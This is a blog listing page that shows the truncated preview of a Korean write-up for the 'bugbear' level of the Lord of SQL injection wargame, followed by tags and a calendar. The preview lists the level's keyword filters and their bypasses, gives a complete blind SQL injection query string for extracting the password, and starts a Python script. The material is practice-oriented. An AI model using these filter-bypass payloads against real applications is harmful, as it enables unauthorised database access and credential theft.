[Lord of SQL injection] bugbear
마흔아홉 번째 글. 1. 코드 분석 single quote, substr, ascii, =, or, and, whitespace, like, 0x... 많은 것들을 필터링하고 있었다. 이 문제 역시 온전한 pw값을 입력해야 풀린다. 2. Exploit 공백 -> %0a or -> || and -> %26%26(이 문제에서는 &&를 URL인코딩을 해줘야 된다.) substr -> mid() ascii -> hex() =,like -> in() ?no=1000%0a||%0aid%0ain(char(97,100,109,105,110))%0a%26%26%0a1%0ain(if(hex(mid(pw,인덱스,1))in(hex(비교값)),1,0))%23 점점 길어진다... import requests sess = requ..
writeup/LOS
2021. 7. 13. 23:46
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
링크
TAG
- dreamhack CSS Injection
- dreamhack web-alasql
- 드림핵 DOM XSS
- webhacking.kr
- hackerfactory
- htb Windows Fundametals
- dreamhack DOM XSS
- 드림핵
- LFI vulnerability
- htb
- CSS Injection
- csp
- Lord of SQL injection
- SQL Injection
- Windows Fundamentals
- hack the box
- 웹해킹
- csp bypass
- xxe injection
- 해커팩토리
- 드림핵 padding oracle
- blind injection
- dreamhack Relative Path Overwrite
- 드림핵 Relative Path Overwrite
- WebHacking
- DreamHack
- dreamhack padding oracle
- php LFI
- wargame
- alasql
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
글 보관함